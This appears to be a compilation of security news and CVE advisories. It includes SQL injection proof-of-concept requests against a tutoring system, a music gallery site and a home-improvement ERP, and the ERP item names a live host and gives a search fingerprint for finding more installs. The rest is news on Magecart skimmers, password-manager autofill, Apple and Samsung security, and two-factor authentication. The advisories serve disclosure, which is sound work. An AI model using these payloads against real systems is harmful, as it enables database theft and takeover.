SQL Injection Vulnerability in tanujpatra228 Tution Management System (TMS) via the email parameter to processes/student_login.process.php.

**SQL Injection Vulnerability at student\_login.process.php**

There is a SQL Injection Vulnerability at student_login.process.php.When a student try to login in to the student dashboard.There is a SQL Injection Vulnerability at the param $id

The Vulnerabilty Loation is bellow.

Here is the PoC

POST /tms/processes/student\_login.process.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 71
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/tms/login\_stud.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

email=ddd'and 1=(updatexml(1,concat(0x3a,(select user())),1))--+&pwd=dd

CVE-2022-45677: temp/README.md at main · yukar1z0e/temp

SQL Injection vulnerability in znfit Home improvement ERP management system V50_20220207,v42 allows attackers to execute arbitrary sql commands via the userCode parameter to the wechat applet.

**Asset Fingerprint**

Home improvement ERP management system fofa grammar(https://fofa.info/)： body="版权所有：上海装盟信息科技有限公司 400-021-8611"

**First**

Due to the irregular settings of some webmasters, I obtained some source code and conducted a code audit on it. The cms is not open source, so I can only give some targeted source code

As shown in the figure, in lines 169-199, the parameter "userCode" is not filtered, and SQL is directly spliced and executed, resulting in SQL injection

Later, I found out that the manufacturer that sells the CMS also has this kind of problem

page as shown

**process**

There is an account login interface on the web side, and there are no loopholes in the normal test. We found that there is a WeChat applet in the scan code login

Then I found a small program on the mobile phone through WeChat search

There is also login on the mobile terminal, and the WeChat applet is captured through the triple linkage of charles+proxifier+burpsuite

http://zminfo.erpjz.com:80/WEB\_SERVICE/WeChatAPI\_ERPMobile.ashx?type=LoginIndex&userCode=admin';WAITFOR DELAY '0:0:5'--&passWord=1

single quotes inject

It is found that the address of this applet is the same as the address of the web side, and the path is directly spliced

Manual injection

Through sqlmap a lock dba permission osshell, whoami direct sys permission

CVE-2022-45564: exp/Injected by Shanghai Zhuangmeng Information Technology Co., Ltd.md at main · Cat-6/exp

Security researchers found a class of flaws that, if exploited, would allow an attacker to access people’s messages, photos, and call history.

For years, Apple has hardened the security systems on iPhones and Macs. But no company is immune from such issues. Research reveals a new class of bugs that can affect Apple’s iPhone and Mac operating systems and if exploited could allow an attacker to sweep up your messages, photos, and call history.

Researchers from security firm Trellix’s Advanced Research Center are today publishing details of a bug that could allow criminal hackers to break out of Apple’s security protections and run their own unauthorized code. The team says the security flaws they found—which they rank as medium to high severity—bypass protections Apple had put in place to protect users.

“The key thing here is the vulnerabilities break Apple’s security model at a fundamental level,” says Doug McKee, director of vulnerability research at Trellix. McKee says that finding the new bug class means researchers and Apple will potentially be able to find more similar bugs and improve overall security protections. Apple has fixed the bugs the company found, and there is no evidence they were exploited.

Trellix’s findings build on previous work by Google and Citizen Lab, a University of Toronto research facility. In 2021, the two organizations discovered ForcedEntry, a zero-click, zero-day iOS exploit that was linked to Israeli spyware maker NSO Group. (The exploit, described as highly sophisticated, was found on the iPhone of a Saudi activist and used to install NSO’s Pegasus malware.)

Analysis of ForcedEntry showed it involved two key parts. The first tricked an iPhone into opening a malicious PDF that was disguised as a GIF. The second part allowed attackers to escape Apple’s sandbox, which keeps apps from accessing data stored by other apps and from accessing other parts of the device. Trellix’s research, by senior vulnerability researcher Austin Emmitt, focuses on that second part and ultimately used the flaws he found to bypass the sandbox.

Specifically, Emmitt found a class of vulnerabilities that revolve around NSPredicate, a tool that can filter code within Apple’s systems. NSPredicate was first abused in ForcedEntry, and as a result of that research in 2021, Apple introduced new ways to stop the abuse. However, those don’t appear to have been enough. “We discovered that these new mitigations could be bypassed,” Trellix says in a blog post outlining the details of its research.

McKee explains that the bugs within this new NSPredicate class existed in multiple places across macOS and iOS, including within Springboard, the app that manages the iPhone’s home screen and can access location data, photos, and the camera. Once the bugs are exploited, the attacker can access areas that are meant to be closed off. A proof-of-concept video published by Trellix shows how the vulnerabilities can be exploited. 

The new class of bugs “brings a lens to an area that people haven’t been researching before because they didn’t know it existed,” McKee says. “Especially with that backdrop of ForcedEntry because somebody at that sophistication level already was leveraging a bug in this class.”

Crucially, any attacker trying to exploit these bugs would require an initial foothold into someone’s device. They would need to have found a way in before being able to abuse the NSPredicate system. (The existence of a vulnerability doesn’t mean that it has been exploited.)

Apple patched the NSPredicate vulnerabilities Trellix found in its macOS 13.2 and iOS 16.3 software updates, which were released in January. Apple has also issued CVEs for the vulnerabilities that were discovered: CVE-2023-23530 and CVE-2023-23531. Since Apple addressed these vulnerabilities, it has also released newer versions of macOS and iOS. These included security fixes for a bug that was being exploited on people’s devices. Make sure you update your iPhone, iPad, and Mac each time a new version of the operating system becomes available.

A New Kind of Bug Spells Trouble for iOS and macOS Security

A vulnerability classified as critical has been found in SourceCodester Music Gallery Site 1.0. This affects an unknown part of the file music_list.php of the component GET Request Handler. The manipulation of the argument cid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221553 was assigned to this vulnerability.

**Music Gallery Site - SQL Injection on page music\_list.php and parameter cid is vulnerable, application url is (?page=music\_list&cid=?).**

> Any remote attacker can access this page to exploit the vulnerbility.

**Date:**

> 21 February 2023

**Author Name:**

> Muhammad Navaid Zafar Ansari

**Author Email:**

> navaidnasari@hotmail.co.uk

**Vendor Homepage:**

> https://www.sourcecodester.com

**Software Link:**

> Music Gallery Site

**Version:**

> v 1.0

**SQL Injection**

> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.

**Affected Page:**

> music\_list.php On this page cid parameter is vulnerable to SQL Injection Attack URL of the vulnerable parameter is: /?page=music\_list&cid=\*

**Description:**

> The Music Gallery site does have public pages for music library, on music list there is an SQL injection to filter out the music list with category basis.

**Proof of Concept:**

> Following steps are involved:

1.  Go to the category menu and click on view category.
2.  In URL, there is a parameter 'cid' which is vulnerable to SQL injection (?page=music\_list&cid=4\*)

**Request:**

    GET /php-music/?page=music_list&cid=5%27+and+false+union+select+1,version(),database(),4,5,6,7--+- HTTP/1.1
    Host: localhost
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Linux"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    

**Response:**

**Recommendation:**

> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:

    Example Code: 
    $sql = $obj_admin->db->prepare("SELECT * FROM `category_list` where `id` = :id and `delete_flag` = 0 and `status` = 1");
    $sql->bindparam(':id', $cid);
    $sql->execute();
    $row = $sql->fetch(PDO::FETCH_ASSOC);
    

Thank you for reading

CVE-2023-0938: CVE_Demo/Music Gallery Site - SQL Injection 1.md at main · navaidzansari/CVE_Demo

Categories: Threat Intelligence
Magecart threat actors continue to go after e-commerce sites while also collecting data points from fake customers.



(Read more...)




The post Multilingual skimmer fingerprints 'secret shoppers' via Cloudflare endpoint API appeared first on Malwarebytes Labs.

One important aspect of data theft in criminal markets revolves around the authenticity of the data that is being resold. There are different services that exist to vet such things as credit card numbers so that buyers can purchase with confidence.

Criminals are also very aware that anyone and in particular security researchers may want to interfere with their operations. Filling up phishing pages with junk data is a sport of its own, although it may also be counterproductive at times. Using special cards for tracing purposes can also be used by defenders to follow the money.

We recently spotted a Magecart skimmer that collects the current victim's IP address and browser user-agent in addition to their email, address, phone number and credit card data. Because the victim already filled in their home address, we believe this is a fingerprinting effort much like what is done in traditional malware campaigns.

**Skimmer targets various geolocations**

The skimmer uses iframes that are loaded if the current page is the checkout and if the browser's local storage does not include a font item (this is equivalent to using cookies to detect returning visitors).

_Figure 1: Skimmer checking for address bar and inserting iframe_

The final rendering is identical to official payment platforms and does not give anything away:

_Figure 2: Fake payment forms injected by skimmer_

**Fingerprinting via Cloudflare API**

The underlying code will scrape everything from the customer's contact and payment forms. This is something that is often overlooked when talking about digital skimmers but yet is extremely important. While financial institutions can reissue you a new card in the mail, the information the criminals have collected is equivalent to a data breach and can be reused for other types of fraud later on.

_Figure 3: Skimmer data collection and fingerprinting_

One thing we noticed that was a little unusual, is code that queries the legitimate Cloudflare endpoint API and parses out the results specifically for two things: the user's current IP address and browser's user-agent. A user-agent string might look something like this:

_Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36_

From this you can determine the user is running Windows 10 (64 bit version) with Chrome version 110.

_Figure 4: Stolen data including IP address and user-agent string_

It's worth noting that this is done _**after**_ credit card data has already been collected and not before. It is quite common to check the user-agent string upon visiting a web page to determine whether a particular victim fits the target profile or to adapt the content to a mobile or desktop experience.

Since the skimmer already grabbed the shopper's city, postal code and country it's unlikely that the IP address would be of much use beyond that. We believe the threat actors are likely collecting IP addresses and user-agent strings for quality checks and monitoring invalid users such as bots and security researchers.

**Conclusion**

We observe a number credit card skimmers targeting e-commerce platforms such as Magento and WordPress/WooCommerce. Online merchants need to be aware of this threat and take appropriate measures to not only be compliant but also to make it much harder to be compromised in the first place. Since we mentioned Cloudflare in this post, it's worth noting that the company provides a service to businesses called Page Shield, that helps keep visitors safe through malicious third-party libraries.

We continue to track and report skimming infrastructure in order to protect our users via our Malwarebytes for consumers and businesses, as well as our Browser Guard extension.

**Indicators of Compromise**

gtag-analytics\[.\]com

gtag-analytics\[.\]com/analytics/15798/script.js?key=  
gtag-analytics\[.\]com/analytics/18452/script.js?key=  
gtag-analytics\[.\]com/analytics/25198/script.js?key=  
gtag-analytics\[.\]com/analytics/31826/script.js?key=  
gtag-analytics\[.\]com/analytics/32444/script.js?key=  
gtag-analytics\[.\]com/analytics/34515/script.js?key=  
gtag-analytics\[.\]com/analytics/65526/script.js?key=

gogletags\[.\]click

Multilingual skimmer fingerprints 'secret shoppers' via Cloudflare endpoint API

Twitter is disabling SMS-based two-factor authentication. Switch to these alternatives to keep your account safe.

The latest bizarre move of Elon Musk’s Twitter ownership weakens the security of millions of accounts. On February 17, Twitter announced plans to stop people using SMS-based two-factor authentication to secure their accounts—unless they start paying for a Twitter Blue subscription. However, there are more secure, free, and easier ways to continue protecting your Twitter account with two-factor authentication.

Two-factor authentication, also known as 2FA or multi-factor authentication, is one of the most effective ways to protect your online accounts from being hacked. When logging in to a website, app, or service, 2FA requires you to sign in using your username and password, then verify that the login is authentic using another piece of information. Most commonly, this involves entering a temporary code that’s generated or sent to you in real time.

This second piece of information helps to prove that the person logging in is actually you. While billions of passwords have been compromised online, the 2FA code is often delivered to or created by the device that’s in your pocket. Having any kind of two-factor authentication turned on is better than none. However, it isn’t entirely foolproof. For years, security researchers have warned that SMS-based two-factor authentication isn’t as secure as other 2FA options.

That’s because SIM-swapping attacks, where phone numbers are compromised by attackers, let criminals access 2FA messages and break into accounts. Put simply: Using another 2FA option, even if it is slightly less convenient, is your best option.

In its announcement, Twitter said people have 30 days to turn off SMS-based 2FA and move to another option. It said the system had been abused by “bad actors” in the past. On March 20, Twitter will “disable” using text messages for two-factor authentication—unless you pay for the privilege. People have already started seeing pop-ups telling them to “remove text message two-factor authentication” before this date. 

However, Twitter’s announcement has baffled, confused, and angered security researchers. They say removing SMS-based 2FA just for people who don’t pay for Twitter Blue doesn’t make any sense and will weaken people’s security if they do not move to another 2FA option. Here’s what you should do to keep your account secure.

Use an Authenticator App or Security Key

Instead of turning 2FA off on your Twitter account, there are two better options: authenticator apps and security keys. They both work using the same principles as SMS-based 2FA. To enable either of these alternatives you will need to visit Twitter, open its **Settings and privacy**, then **Security and account access**, **Security**, and finally **Two-factor authentication**. (Or just click here if you are logged in). Here you will get the option to use two-factor authentication via an app or using security keys.

Instead of sending your six-digit authentication code via SMS message, authenticator apps are constantly generating the codes themselves and are synced with the services you use. Authenticator apps list all the websites you have registered with them and display the codes you need to enter to log in. These codes refresh every 30 seconds. Each time you need to log in to a website or app, you visit the authenticator app after entering your username and password to get the authentication code instead of waiting for a text message. (It’s particularly helpful if your phone doesn’t have connectivity for some reason.)

There are multiple, free two-factor authentication apps to pick from, although they all offer the same essential service and can be used across platforms. The big players have their own apps:There’s Google’s Authenticator App and Microsoft Authenticator. Alternatively, various password managers that you may already use, such as 1Password, have their own authenticator services. There’s also Twilio’s Authy App. And if you have an iPhone, you can use Apple’s built-in generator. 

Each has pros and cons that you should consider before picking one. For instance, you may be heavily locked into Microsoft’s or Google’s ecosystems and want to use their apps. Google’s is relatively basic but doesn’t sync elsewhere; Microsoft’s app offers password management services. However, the Microsoft and Authy apps appear to collect more user analytics data than Google’s. Whatever app you pick, it’s possible to switch to another authenticator.

Setting up an authentication app on Twitter, and anywhere else, is simple. For Twitter, you need to visit its 2FA page. Then open your authentication app, select the option to add a new account, then scan the QR Twitter shows you. Enter the six-digit code on your app and you’re done.

Alternatively, instead of an authenticator app, you can use a security key. The keys are physical pieces of hardware that you either plug into your computer when logging in or connect to your phone. They’re the most secure method of 2FA as an attacker physically needs the key to log in to your account—whereas an attacker always has the possibility of trying to trick you into handing over a generated six-digit authentication code.

Once you’ve set up an authenticator app or hardware key for Twitter, you’ll also want to make a note of Twitter’s backup code for your account. The backup code can be used to log in to Twitter if you can’t access your 2FA options, such as losing your phone or security key. (The first time you set up 2FA on Twitter it will provide you with a backup code, although this can be regenerated online.) You should save this in a safe place, such as your password manager.

How to Protect Yourself from Twitter’s 2FA Crackdown

Samsung has announced a new feature called Message Guard that comes with safeguards to protect users from malware and spyware via what's referred to as zero-click attacks.
The South Korean chaebol said the solution "preemptively" secures users' devices by "limiting exposure to invisible threats disguised as image attachments."
The security feature, available on Samsung Messages and Google

Mobile Security / Zero Day

Samsung has announced a new feature called **Message Guard** that comes with safeguards to protect users from malware and spyware via what's referred to as zero-click attacks.

The South Korean chaebol said the solution "preemptively" secures users' devices by "limiting exposure to invisible threats disguised as image attachments."

The security feature, available on Samsung Messages and Google Messages, is currently limited to the Samsung Galaxy S23 series, with plans to expand it to other Galaxy smartphones and tablets later this year that are running on One UI 5.1 or higher.

Zero-click attacks are highly-targeted and sophisticated attacks that exploit previously unknown flaws (i.e., zero-days) in software to trigger execution of malicious code without requiring any user interaction.

Unlike traditional methods of remotely exploiting a device wherein threat actors rely on phishing tactics to trick a user into clicking on a malicious link or opening an rogue file, such attacks circumvent the need for social engineering entirely and provide an adversary with an entry point.

A majority of the zero-click exploits are engineered to take advantage of vulnerabilities in applications such as messaging, SMS, or email apps that receive and process untrusted data.

As a result, if there exists a security vulnerability in the manner an app interprets the incoming data, a threat actor could weaponize this shortcoming to craft a malicious image that, when sent to a target's device, automatically executes the code embedded within it.

The lack of interaction involved in zero-click attacks means there are fewer traces of any nefarious activity, making them highly-prized tools to deliver spyware capable of monitoring individuals and harvesting a wealth of sensitive information.

Samsung's Message Guard works against a number of image formats, including PNG, JPG/JPEG, GIF, ICO, WEBP, BMP, and WBMP, and essentially acts as a sandbox that's designed to quarantine images received via the app from the rest of the operating system.

"Message Guard checks the file bit by bit and processes it in a controlled environment to ensure it cannot infect the rest of your device," the company said.

The feature is also analogous to a feature in Apple's iMessage called BlastDoor that the tech giant incorporated in iOS 14 as a means to counter zero-click attacks via its messaging app.

Apple, last year, also introduced an "extreme, optional protection" setting dubbed Lockdown Mode that hardens iPhones and iPads against "extremely rare and highly sophisticated cyber attacks."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Samsung Introduces New Feature to Protect Users from Zero-Click Malware Attacks

In Epiphany (aka GNOME Web) through 43.0, untrusted web content can trick users into exfiltrating passwords, because autofill occurs in sandboxed contexts.

**Summary**

Multiple password managers can be tricked into auto-filling credentials into untrusted pages. This can lead to account compromise for any users using these password managers.

**Severity**

High - This vulnerability leverages password managers to auto-fill credentials into untrusted pages, without the master password.

**Proof of Concept**

1.  Go to https://coop.xss.guru/sign-in and enter credentials
2.  Have the password manager save the credentials
3.  Go to https://coop.xss.guru/sign-in-alt and confirm that the password manager autofills the credentials as expected
4.  Go to https://coop.xss.guru/sign-in-phish-csp-sandbox: The password manager should not auto-fill credentials since the page has a CSP sandbox response header
5.  Go to https://coop.xss.guru/sign-in-phish-iframe-sandbox: The password manager should not auto-fill credentials since the form is inside of a sandboxed iframe

**Further Analysis**

Password managers should check whether content is sandboxed before auto-filling credentials. This can be done in many ways, but one way is to check self.origin of a page and refusing to fill in credentials if self.origin is "null".

1.  Bitwarden: Vulnerable - Bitwarden was found to auto-fill credentials into both types of sandboxed content as soon as the user clicked on the Bitwarden chrome extension. Fixed and released on 12/14/2022.
2.  DashLane: Vulnerable - DashLane immediately auto-fills credentials into the CSP sandboxed page. It displays a warning box before auto-filling credentials into the sandboxed iframe. Fixed and released on 12/2/2022.
3.  Safari: Vulnerable - Safari auto-fills credentials into both types of sandboxed content though user interaction is required.
4.  LastPass: Secure
5.  1Password: Secure
6.  Chrome: Secure
7.  Edge: Secure

**Timeline**

**Date reported**: 10/19/2022, Vulnerability reported to Apple on 1/18/2023  
**Date fixed**: Fixed in Bitwarden (12/14/2022) and DashLane (12/2/2022)  
**Date disclosed**: 1/17/2023

CVE-2023-26081: Unsandboxed Password Manager

Apple continues to tighten iOS security, and iOS 16.3 (and iPadOS 16.3, and macOS Ventura 13.2) includes support for physical security keys. In other words, a physical device can verify your Apple ID login in place of a passcode. It’s a great way to boost your security, and here’s how it works.

These keys work in tandem with two-factor authentication (2FA), so you still need your password. If you already have 2FA set up on your account, you’re familiar with logging into a new Apple device using your email address and password and then having a six-digit code sent via SMS or to another device (like an iPhone or a Mac) that you're already logged in on. The security key replaces that second step, the passcode.

The thinking is that having something physical that stays with you is more secure than a passcode, which can be guessed, brute-forced, or viewed over your shoulder. Apple says the security key provides “extra protection from targeted attacks, such as phishing or social engineering scams.” While a scam website or app might trick you into revealing a six-digit number, getting you to hand over a physical object is much harder.

If you want to start using security keys with your Apple ID, you first need to have 2FA switched on for your account. If you haven’t already enabled it, open Settings on your iPhone, then tap your name at the top, followed by **Password & Security** and **Turn On Two-Factor Authentication**. Follow the instructions for setting up a phone number to receive SMS messages, and specify any other trusted devices you want to use it with.

How Security Keys Work

Generally speaking, 2FA comes into play when you log in on a new device or on a device you haven’t used for a long time—this isn’t a process you need to do every time you open your Mac or unlock your iPhone, as they’ll be designated as trusted devices. 2FA adds an extra step to the login process, in addition to a username and password, because those details can be guessed, tricked out of you, or leaked on the web.

Once you set up security keys, they become the extra step. They either plug directly into a lightning or USB port on your device, or (on iPhones only) they can communicate wirelessly via the NFC protocol. They essentially prove that you are who you say you are, giving you access to your Apple ID and all of your apps and services.

Security keys can be set up from iPhones, iPads, or Macs.

Photograph: Apple

It’s important to note that you don’t want to lose your security key. Apple will prompt you to set up two to begin with, so you can keep a backup in a safe place. But if you do somehow misplace both of them, there’s a chance you might be permanently locked out of your account (there may be recovery options, but Apple isn’t specifying what they are, perhaps for security reasons).

You also need to follow this process when logging in to your Apple ID in a new web browser, and there are a few places where it won’t work (at least not yet). Perhaps the most important one is iCloud for Windows, so you might want to hold off if you use your Apple account on Windows devices. And you can’t use security keys with Apple devices running older software or with Apple IDs assigned to children.

Setting Up Security Keys

The first step is buying a couple of security keys, which go for around $50 each online. Apple says you need keys certified to work with the FIDO (Fast ID Online) standard, and with the right connections for your devices: NFC (iPhones) only, lightning, USB-C, or USB-A. It’s fine to use adapter dongles and cables with these security keys, which should make it easier to find keys that work across everything you’re going to use.

With your physical keys in hand and the latest software updates installed, you can set everything up from an iPhone or an iPad by going to Settings, tapping on your name at the top, and choosing **Password & Security**. Choose **Add Security Keys** to be directed through the process of associating them with your Apple ID. At the same time, you can review all the devices that are currently linked to your Apple ID.

The YubiKey 5C NFC is one security key recommended by Apple.

Photograph: Yubico

On macOS, make sure you’re running the latest software, then open the **Apple** menu and choose **System Settings**. Click on your name at the top of the navigation pane on the left, then pick **Password & Security** and click **Add** next to the Security Keys heading. You’ll then be taken through the steps needed to associate your keys with your account, and you’ll be shown the devices you’re already using with your Apple ID.

You need to add at least two security keys to your account, as we mentioned earlier, and you can add up to six. Head to the same screens on iOS, iPadOS, or macOS if you want to delete one or more of your security keys—you’ll see a **Remove All Security Keys** option. If you select this, the two-factor authentication process will revert to using the passcode method, as it did before.

How to Unlock Your iPhone With a Security Key

The company will soon require users to pay for a Twitter Blue subscription to get sign-in codes via SMS. Security experts are baffled.

Twitter announced yesterday that as of March 20, it will only allow its users to secure their accounts with SMS-based two-factor authentication if they pay for a Twitter Blue subscription. Two-factor authentication, or 2FA, requires users to log in with a username and password and then an additional “factor” such as a numeric code. Security experts have long advised that people use a generator app to get these codes. But receiving them in SMS text messages is a popular alternative, so removing that option for unpaid users has left security experts scratching their heads.

Twitter's two-factor move is the latest in a series of controversial policy changes since Elon Musk acquired the company last year. The paid service Twitter Blue—the only way to get a blue verified checkmark on Twitter accounts now—costs $11 per month on Android and iOS and less for a desktop-only subscription. Users being booted off of SMS-based two-factor authentication will have the option to switch to an authenticator app or a physical security key.

“While historically a popular form of 2FA, unfortunately, we have seen phone-number-based 2FA be used—and abused—by bad actors,” Twitter wrote in a blog post published Friday evening. “So starting today, we will no longer allow accounts to enroll in the text message/SMS method of 2FA unless they are Twitter Blue subscribers.”

In a July 2022 report about account security, Twitter said that only 2.6 percent of its active users have any type of two-factor authentication enabled. Of those users, nearly 75 percent were using the SMS version. Almost 29 percent were using authenticator apps, and less than 1 percent had added a physical authentication key.

SMS-based two-factor authentication is insecure because attackers can hijack targets' phone numbers or use other techniques to intercept the texts. But security experts have long emphasized that using SMS two-factor is significantly better than having no second authentication factor enabled. 

Increasingly, tech giants like Apple and Google have eliminated the option for SMS two-factor and transitioned users (typically over many months or years) to other forms of authentication. Researchers worry that Twitter's policy change will confuse users by giving them so little time to complete the transition and making SMS two-factor seem like a premium feature.

“The Twitter blog is right to point out that two-factor authentication that uses text messages is frequently abused by bad actors. I agree that it is less secure than other 2FA methods,” says Lorrie Cranor, director of Carnegie Mellon's usable privacy and security lab. “But if their motivation is security, wouldn't they want to keep paid accounts secure too? It doesn't make sense to allow the less secure method for paid accounts only.”  

While the company says its changes to two-factor will roll out in mid-March, Twitter users with SMS two-factor turned on started encountering a pop-up overlay screen on Friday that advised them to remove two-factor entirely or switch to “the authentication app or security key methods.” 

It is unclear what will happen if users do not disable SMS two-factor by the new deadline. The in-app message to users implies that people who still have SMS two-factor turned on when the change officially happens on March 20 will be locked out of their accounts. “To avoid losing access to Twitter, remove text-message two-factor authentication by March 19, 2023,” the notification says. But Twitter's blog post says that two-factor will simply be disabled on March 20 if users don't adjust it before then. “After 20 March 2023, we will no longer permit non–Twitter Blue subscribers to use text messages as a 2FA method,” the company wrote. “At that time, accounts with text message 2FA still enabled will have it disabled.”

Twitter did not return a request for comment about what will happen to accounts that still have SMS two-factor enabled on March 20. The company also did not answer questions about the possibility that the policy change will result in a significant loss of two-factor adoption on the platform.

“On the surface, this sounds like a good degree of concern for users’ safety, but if you pay for Twitter Blue—and are, therefore, a customer who is serious about your Twitter usage and who Twitter should care about the most—you can continue to use that less secure method of authentication. Huh?” says Jim Fenton, an independent identity privacy and security consultant. “And if you aren't a Twitter Blue subscriber, and they downgrade you to just password-based authentication, now they've fully taken something that's purported to improve users’ security and done exactly the opposite.”

On Friday evening, the Twitter account “T(w)itter Takeover News” echoed the company's comments about phone-number-based 2FA being abused by scammers. The account tweeted that “Twitter changed its policies … regarding SMS based 2FA because Telcos Used Bot Accounts to Pump 2FA SMS. They were losing $60mn/yr on scam SMS.” Shortly after, Elon Musk’s Twitter account replied, “Yup.”

Musk has long said that he is in a war against Twitter bots, but he has struggled to deal with separating legitimate bots from malicious ones. Meanwhile, Twitter's SMS two-factor mechanism had outages and reliability problems in mid-November amid chaos inside the company during the early days of Musk's leadership.

Eliminating SMS two-factor “might very incrementally decrease Twitter's costs by not requiring Twitter to pay some telco provider a fraction of a cent to send those SMS messages,” Fenton says. But he adds that the cost savings would likely be extremely minor.

Fenton notes, too, that the move would make more sense if Twitter were also announcing support for the new authentication mechanism known as “passkeys” that tech giants have increasingly been adopting as a way to reduce user reliance on passwords. “Twitter would basically be saying that they’re substituting a new authentication method that also doesn’t require buying a hardware security key,” Fenton says. “But the Twitter Blue exception still wouldn't make sense.”

As the situation plays out, the big question is whether any of it will result in stronger security for Twitter users' accounts. 

“I don't think we really know whether this will nudge people to go ahead and get an authenticator app or whether a lot of people will just give up on 2FA,” Carnegie Mellon's Cranor says. “In general, two-factor authentication is not widely adopted by users unless they are forced to use it. I think a lot of other companies will be watching to see whether disallowing text-message 2FA is a good idea or not.”  

Whether Twitter will be transparent about the impacts of the changes and release updated statistics is another question entirely.

Tag

#apple